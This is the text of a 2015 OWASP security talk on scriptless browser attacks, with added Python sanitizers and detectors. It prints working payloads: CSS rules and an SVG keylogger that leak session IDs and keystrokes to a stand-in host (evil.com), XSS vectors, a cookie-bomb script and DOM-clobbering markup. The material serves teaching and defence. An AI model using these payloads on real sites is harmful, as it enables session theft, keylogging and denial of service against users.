I Didn't See That Coming

OWASP Cluj-Napoca 29th January 2015

Who am I?

CSS
HTML
SCRIPTS

Cascading Style Sheets 

Style sheet language used for describing the look and formatting of a document written in a markup language.

Facts

18 years old; 

Invented by Opera CTO Håkon Wium Lie;

It was a competitor to Netscape's JSSS;

Originally it was a "Style Sheet Language".

Problems

CSS Expressions (IE 5-10)

Data Leakage via Attribute-Selector

Mutation XSS

And ++

<p style=color:expression(alert(1))>
IN: <p style="font-family":'\22\3bx:expression(alert(1))/*'">
OUT: <P style="FONT-FAMILY: ; x: expression(alert(1))"></P>

SESSIONS OWNAGE

CSS

@-moz-document  -  Gecko-engine-specific at-rule that restricts the style rules contained within it based on the URL of the document.

regexp("") {}  -  Regular expressions are patterns used to match character combinations in strings; the enclosed rules apply only when the document URL matches the pattern.

ul li:nth-child(n){}  -  Selector matches every element that is the nth child, regardless of type, of its parent.

background:url()  -  Loads a background file from another source.


Attack

@-moz-document regexp(".*PHPSESSID=0.*"){
    ul li:nth-child(1){background:url(//evil.com/?character:0#position:0)}
}

@-moz-document regexp(".*PHPSESSID=.0.*"){
    ul li:nth-child(2){background:url(//evil.com/?character:0#position:1)}
}

Brute-force  0-9 | a-z | A-Z

http://html5sec.org/cssession/?PHPSESSID=SESSION_ID

For more information check Mario Heiderich's research.

http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf

http://www.slideshare.net/x00mario/stealing-the-pie
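Both CSS slides above come down to the same defensive question: what must a site check before it serves CSS that a user supplied? The script below is an added example (not code from the talk or from html5sec.org). It decodes CSS backslash escapes first, because the filter in the mutation XSS slide was handed '\22\3b' and never saw the '";' those escapes stand for, and then flags expression(), @-moz-document and url() references to hosts outside an allow-list. The finding labels and the allowed_hosts parameter are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit

# CSS backslash escapes: \HHHHHH (1-6 hex digits, optional trailing whitespace)
# or \<any single character>. A CSS parser decodes these before tokenising,
# so a filter that scans the raw text is looking at something the browser
# never sees.
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\(.)", re.S)


def css_unescape(text):
    """Decode CSS escape sequences the way a CSS tokeniser would."""
    def replace(match):
        if match.group(1):
            codepoint = int(match.group(1), 16)
            return chr(codepoint) if 0 < codepoint <= 0x10FFFF else "\ufffd"
        return match.group(2)
    return _CSS_ESCAPE.sub(replace, text)


def audit_css(css, allowed_hosts=()):
    """Return a list of findings for a user-supplied CSS fragment.

    Finding labels (constructed for this example):
      'css-expression'       IE expression(): script execution from a style
      'moz-document'         @-moz-document: rules keyed on the page URL
      'external-url:<host>'  url() fetching from a host not in allowed_hosts
    """
    decoded = css_unescape(css)
    lowered = decoded.lower()
    findings = []
    if re.search(r"expression\s*\(", lowered):
        findings.append("css-expression")
    if "@-moz-document" in lowered:
        findings.append("moz-document")
    # Every url() is a request the victim's browser will make; only hosts on
    # the allow-list may receive one.
    for match in re.finditer(r"""url\(\s*["']?([^"')]+)""", decoded, re.IGNORECASE):
        host = urlsplit(match.group(1).strip()).hostname
        if host and host not in allowed_hosts:
            findings.append("external-url:" + host)
    return findings


if __name__ == "__main__":
    # Constructed inputs: the session-stealing rule and the escaped expression().
    print(audit_css('@-moz-document regexp(".*PHPSESSID=0.*"){'
                    ' ul li:nth-child(1){background:url(//evil.com/?character:0#position:0)} }'))
    print(audit_css("font-family\":'\\22\\3bx:expression(alert(1))/*'"))
```

The check is deliberately conservative: it does not strip comments first, so a token hidden behind a /* still counts, and it flags every @-moz-document regardless of the matching function used, since url-prefix() and domain() variants key on the URL just as regexp() does.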

KEYLOGGER

SVG

Scalable Vector Graphics is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation. 

set  -  The 'set' element provides a simple means of just setting the value of an attribute for a specified duration.
    attributeName  -  the attribute to set (here xlink:href).
    to  -  Specifies the value for the attribute during the duration of the 'set' element.

accessKey()  -  Describes a key press event and an optional offset that will begin the element.

SVG

Attack

<svg height="0px">
    <image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none">
        <set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" />
           ...
        <set attributeName="xlink:href" begin="accessKey(z)" to="//evil.com/?z" />
    </image>
</svg>

Map: a-z  |  A-Z  |  0-9

http://html5sec.org/keylogger/

For more information check Mario Heiderich's research.

http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf

http://www.slideshare.net/x00mario/stealing-the-pie
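The keylogger works without a single line of script, so a script-stripping sanitizer lets it through. What a site accepting uploaded SVG needs is a check on the SMIL animation elements themselves. The code below is an added example (not from the talk or html5sec.org): it parses an SVG, reports every animation element whose begin uses accessKey() or whose target attribute is an href, and offers a strip function that removes the animation elements while keeping the static image. The sample SVG is constructed, based on the slide's snippet with the elided rows filled by a second concrete key.

```python
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("xlink", XLINK_NS)

# SMIL animation elements that can rewrite an attribute at runtime.
ANIMATION_TAGS = {"set", "animate", "animatetransform", "animatemotion"}

# Constructed sample: the slide's pattern with two concrete keys.
SAMPLE_SVG = """<svg height="0px">
    <image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none">
        <set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" />
        <set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b" />
    </image>
</svg>"""


def _local_name(tag):
    # ElementTree reports namespaced tags as '{uri}name'; keep only 'name'.
    return tag.rsplit("}", 1)[-1].lower()


def find_keylogger_patterns(svg_text):
    """Return (kind, detail) findings for animation elements that react to a
    key press or rewrite an href (the two halves of the keylogger slide)."""
    root = ET.fromstring(svg_text)
    findings = []
    for element in root.iter():
        if _local_name(element.tag) not in ANIMATION_TAGS:
            continue
        begin = element.get("begin", "")
        attribute_name = element.get("attributeName", "")
        target = element.get("to", "")
        if "accesskey(" in begin.lower():
            findings.append(("accesskey-trigger", begin))
        if attribute_name.lower().endswith("href") and target:
            findings.append(("href-rewrite", target))
    return findings


def strip_animations(svg_text):
    """Remove every SMIL animation element; the static drawing survives."""
    root = ET.fromstring(svg_text)
    # Snapshot the tree first so removals do not disturb the walk.
    for parent in list(root.iter()):
        for child in list(parent):
            if _local_name(child.tag) in ANIMATION_TAGS:
                parent.remove(child)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for kind, detail in find_keylogger_patterns(SAMPLE_SVG):
        print(kind, detail)
    print(strip_animations(SAMPLE_SVG))
```

Serving uploaded SVG as an image (an img tag or a CSS background) rather than inline also neutralises this class, because image rendering contexts do not deliver key events to the document; the stripping above is for cases where inline SVG is required.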

CONDITIONAL

COMPILATION

What is it?

Conditional compilation lets you dictate to IE whether to compile certain parts of your JScript or JavaScript code depending on predefined and user defined conditions.

Supported in Internet Explorer (4-10); 

Lost...

<script>
/*@cc_on @*/
/*@
    document.write("JavaScript version: " + @_jscript_version + ".");
    document.write("<br />");
    @if (@_win32)
        document.write("Running on the 32-bit version of Windows.");
    @elif (@_win16)
        document.write("Running on the 16-bit version of Windows.");
    @else
        document.write("Running on a different operating system.");
    @end
@*/
</script>

But as always

<script>@set@a=1alert(1)</script>

Local Page

COOKIE BOMB

let's break the Internet!

How? Cookies.

What? Your browser will keep sending those cookies and servers will reject the requests.

Why? Because Cookie header will be very long.

Result: the entire Internet will look like it is down, but only to you.

Some technical info

Max cookie size: 4k;

Max number of cookies: No idea but enough;

What do I need? JS Execution on a Domain including Subdomains 

Attack


var pollution = Array(4000).join('a');
for(var i=1;i<99;i++){
    document.cookie='bomb'+i+'='+pollution+';'
}

Any Site

For more information check Egor Homakov's research.

http://homakov.blogspot.ro/2014/01/cookie-bomb-or-lets-break-internet.html
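The reason the bomb sticks is that the server rejects the request before any application code can clean up, so recovery has to happen at the edge, in whatever component still reads the oversized header. The function below is an added example (not from the talk or from Homakov's post) of that edge logic: when a Cookie header is over a size limit it emits Set-Cookie deletions for every oversized cookie and leaves small cookies such as the real session alone. The thresholds, the domain parameter and the cookie names in the sample are constructed.

```python
# Constructed thresholds for this example: many servers reject a request whose
# headers exceed roughly 8 KB, and a single cookie is capped near 4 KB, so a
# few bomb cookies are enough to push the header over the limit.
MAX_COOKIE_HEADER_BYTES = 8192
SUSPICIOUS_COOKIE_BYTES = 1024


def parse_cookie_header(header):
    """Split a raw Cookie header into (name, value) pairs, keeping order."""
    pairs = []
    for chunk in header.split(";"):
        chunk = chunk.strip()
        if not chunk:
            continue
        # Only the first '=' separates name from value; later ones are data.
        name, _, value = chunk.partition("=")
        pairs.append((name.strip(), value))
    return pairs


def cookie_bomb_cleanup(header, domain, limit=MAX_COOKIE_HEADER_BYTES):
    """Return Set-Cookie header values that expire every oversized cookie when
    the Cookie header itself is over the limit; an empty list otherwise.

    A deletion only takes effect if Domain and Path match the attributes the
    cookie was set with; this example assumes the bomb was planted as domain
    cookies with Path=/, which is what a subdomain needs to poison the parent.
    """
    if len(header.encode("utf-8")) <= limit:
        return []
    deletions = []
    for name, value in parse_cookie_header(header):
        if len(value) >= SUSPICIOUS_COOKIE_BYTES:
            deletions.append(
                f"{name}=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:00 GMT; "
                f"Domain={domain}; Path=/"
            )
    return deletions


if __name__ == "__main__":
    # Constructed request: one real session cookie plus three 4 KB bomb cookies.
    header = "session=abc123; " + "; ".join(
        "bomb%d=%s" % (i, "a" * 4000) for i in range(1, 4))
    for line in cookie_bomb_cleanup(header, ".example.com"):
        print("Set-Cookie:", line[:60] + "...")
```

Whatever runs this must accept the oversized header in the first place, which means raising the header buffer on a dedicated cleanup endpoint or at the reverse proxy; the same path is the place to apply the real fix, keeping user-controlled script off every host that can set cookies for the parent domain.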

PAGE DOS & ++

What are you talking about? User-supplied HTML elements with name attributes matching DOM variables would prevent JavaScript from accessing those variables.

Tell me more... An element like <img src='something.png' name='querySelector'> would cause JavaScript references to document.querySelector to return the image element rather than the querySelector function.

JavaScript namespace clobbering

Examples

<img src="#" name="user-content-top">
<img src="#" name="user-content-window">
<img src="#" name="user-content-location">
<img src="#" name="user-content-document">
<img src="#" name="user-content-history">
<img src="#" name="user-content-screen">
<img src="#" name="user-content-postMessage">
<img src="#" name="user-content-atob">
<img src="#" name="user-content-onload">
<img src="#" name="user-content-onkeyup">
<img src="#" name="user-content-onkeypress">
<img src="#" name="user-content-onkeydown">
<img src="#" name="user-content-images">
<img src="#" name="user-content-head">
<img src="#" name="user-content-body">
<img src="#" name="user-content-cookie">
<img src="#" name="user-content-URL">
<img src="#" name="user-content-domain">
<img src="#" name="user-content-referrer">
<img src="#" name="user-content-title">

For more information check Mathias Karlsson's work.

https://bounty.github.com/researchers/avlidienbrunn.html

Remember DOM Clobbering?

<script>
    if(top!=self){
        top.location=self.location
    }
</script>
<form name=self location="javascript:alert(1)"></form>
<script>
    if(top!=self){
        top.location=self.location
    }
</script>

PATCHED!

http://www.thespanner.co.uk/2013/05/16/dom-clobbering/

For more information check Gareth Heyes' research.
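Both clobbering slides rest on the same browser behaviour: an element's id or name becomes a property on window or document, shadowing whatever lived there (top, self, querySelector). The user-content- prefix visible in the GitHub examples above is the usual fix, and the code below is an added example of it (not GitHub's code, and not from the talk): it re-serialises a user-supplied HTML fragment with every id and name prefixed, and separately reports values that collide with well-known globals so the attempt can be logged. KNOWN_GLOBALS is a short constructed list drawn from the names the slides show; a production list is much longer.

```python
from html import escape
from html.parser import HTMLParser

PREFIX = "user-content-"
# Attributes whose values become window/document properties (named access).
NAMED_ACCESS_ATTRS = {"id", "name"}
# A few of the globals the slides show being clobbered (constructed list).
KNOWN_GLOBALS = {"top", "self", "window", "location", "document", "history",
                 "cookie", "domain", "referrer", "querySelector", "postMessage"}


class UserContentPrefixer(HTMLParser):
    """Re-serialise HTML, prefixing every id/name so it cannot shadow a DOM global."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.parts = []
        self.clobber_attempts = []

    def _attributes(self, attrs):
        rendered = []
        for key, value in attrs:
            if key in NAMED_ACCESS_ATTRS and value is not None:
                if value in KNOWN_GLOBALS:
                    self.clobber_attempts.append(value)
                if not value.startswith(PREFIX):
                    value = PREFIX + value
            if value is None:
                rendered.append(f" {key}")
            else:
                # HTMLParser hands us decoded values; re-escape on output.
                rendered.append(f' {key}="{escape(value, quote=True)}"')
        return "".join(rendered)

    def handle_starttag(self, tag, attrs):
        self.parts.append(f"<{tag}{self._attributes(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.parts.append(f"<{tag}{self._attributes(attrs)} />")

    def handle_endtag(self, tag):
        self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        self.parts.append(data)

    def handle_entityref(self, name):
        self.parts.append(f"&{name};")

    def handle_charref(self, name):
        self.parts.append(f"&#{name};")

    def handle_comment(self, data):
        self.parts.append(f"<!--{data}-->")


def prefix_user_content(html_fragment):
    """Return (rewritten_html, list_of_global_names_the_input_tried_to_shadow)."""
    parser = UserContentPrefixer()
    parser.feed(html_fragment)
    parser.close()
    return "".join(parser.parts), parser.clobber_attempts


if __name__ == "__main__":
    # Constructed inputs: the frame-buster bypass and a plain image.
    for fragment in ('<form name=self location="javascript:alert(1)"></form>',
                     '<img src="#" name="querySelector">'):
        print(prefix_user_content(fragment))
```

The prefix makes the frame-busting check on the slide safe again, because self now resolves to the window rather than to a form element carrying its own location attribute; the clobber_attempts list exists so that the rewrite can be paired with detection rather than silently fixing things.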

FILL DISK

Driving people crazy... 

Why?  For Fun And/Or Profit.

How? HTML5 localStorage.

What? The localStorage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB).

But are there limits?

Yeah..

5 MB per origin in Google Chrome, Mozilla Firefox, and Opera;

10 MB per storage area in Internet Explorer;

25 MB per origin on BlackBerry 10 devices.

But...

"Attacking..."

Subdomains are your friends:

1.domain.com; 2.domain.com; ...; N.domain.com.

http://www.filldisk.com/

It's Over!

Credits

Images by sheeps.it

Presentation:
by Renato Rodrigues | @simps0n | pathonproject.com

Content:

Made with Slides.com